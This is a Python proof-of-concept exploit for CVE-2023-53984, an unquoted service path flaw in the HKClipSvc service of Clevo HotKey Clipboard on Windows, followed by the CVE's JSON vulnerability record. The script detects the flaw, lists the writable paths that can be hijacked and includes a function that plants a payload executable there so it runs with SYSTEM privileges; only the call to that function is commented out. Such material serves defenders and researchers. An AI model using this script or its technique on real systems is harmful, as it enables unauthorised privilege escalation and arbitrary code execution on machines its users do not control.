CVE-2023-53984

# CVE-2023-53984 PoC - Clevo HotKey Clipboard HKClipSvc Unquoted Service Path # Author: Security Researcher # Date: 2023 import os import sys import ctypes import subprocess from pathlib import Path def check_vulnerability(): """ Check if the system is vulnerable to CVE-2023-53984 Checks for unquoted service path in HKClipSvc service """ try: # Query HKClipSvc service configuration result = subprocess.run( ['sc', 'qc', 'HKClipSvc'], capture_output=True, text=True, creationflags=subprocess.CREATE_NO_WINDOW if hasattr(subprocess, 'CREATE_NO_WINDOW') else 0 ) if 'BINARY_PATH_NAME' in result.stdout: print("[+] HKClipSvc service found") # Extract binary path for line in result.stdout.split('\n'): if 'BINARY_PATH_NAME' in line: path = line.split(':', 1)[1].strip() print(f"[+] Binary path: {path}") # Check if path is unquoted and contains spaces if ' ' in path and not path.startswith('"'): print("[!] VULNERABLE: Unquoted service path detected!") # Identify exploitable paths path_parts = path.split(' ') exploitable_paths = [] current_path = path_parts[0] for i, part in enumerate(path_parts[1:]): current_path += '\\' + part exe_path = current_path + '.exe' exploitable_paths.append(exe_path) print(f"[!] Exploitable paths:") for p in exploitable_paths: print(f" - {p}") return True, exploitable_paths else: print("[-] NOT VULNERABLE: Path is properly quoted") return False, [] except Exception as e: print(f"[-] Error: {e}") return False, [] def exploit_vulnerability(exe_path, payload_path): """ Exploit the unquoted service path vulnerability Creates a malicious executable at the exploitable path Args: exe_path: Path where malicious exe should be placed payload_path: Path to the payload executable """ try: # Check if we have write permissions to the target path target_dir = os.path.dirname(exe_path) if not os.access(target_dir, os.W_OK): print(f"[-] No write permission to {target_dir}") print("[-] This exploit requires administrative privileges or specific file permissions") return False # Copy payload to exploitable path if os.path.exists(payload_path): print(f"[+] Copying payload to {exe_path}") import shutil shutil.copy2(payload_path, exe_path) print(f"[+] Payload deployed successfully") print(f"[!] When HKClipSvc restarts, the payload will execute with SYSTEM privileges") return True else: print(f"[-] Payload not found: {payload_path}") return False except PermissionError: print("[-] Permission denied - requires elevated privileges") return False except Exception as e: print(f"[-] Exploit failed: {e}") return False def main(): print("=" * 60) print("CVE-2023-53984 - Clevo HotKey Clipboard Exploitation Tool") print("=" * 60) # Check if running on Windows if sys.platform != 'win32': print("[-] This exploit only works on Windows systems") sys.exit(1) print("\n[+] Checking for vulnerability...") is_vulnerable, exploitable_paths = check_vulnerability() if is_vulnerable: print("\n[!] System is VULNERABLE to CVE-2023-53984") print("\n[!] To exploit, place a malicious executable at one of the paths above") print("[!] Then restart the HKClipSvc service or wait for system reboot") # Example exploitation (commented out for safety) # payload = "C:\\temp\\malicious.exe" # for path in exploitable_paths: # exploit_vulnerability(path, payload) else: print("\n[-] System does not appear to be vulnerable") if __name__ == '__main__': main()

{"cve": {"id": "CVE-2023-53984", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:59.430", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Clevo HotKey Clipboard 2.1.0.6 contains an unquoted service path vulnerability in the HKClipSvc service that allows local non-privileged users to potentially execute code with system privileges. Attackers can exploit the misconfigured service path to inject and execute arbitrary code by placing malicious executables in specific file system locations."}, {"lang": "es", "value": "Clevo HotKey Clipboard 2.1.0.6 contiene una vulnerabilidad de ruta de servicio sin comillas en el servicio HKClipSvc que permite a usuarios locales no privilegiados ejecutar código potencialmente con privilegios de sistema. Los atacantes pueden explotar la ruta de servicio mal configurada para inyectar y ejecutar código arbitrario colocando ejecutables maliciosos en ubicaciones específicas del sistema de archivos."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://web.archive.org/web/20200713203236/https://www.clevo.com.tw/index-en.asp", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/51206", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/hotkey-clipboard-privilege-escalation-unquoted-service-path", "source": "[email protected]"}]}}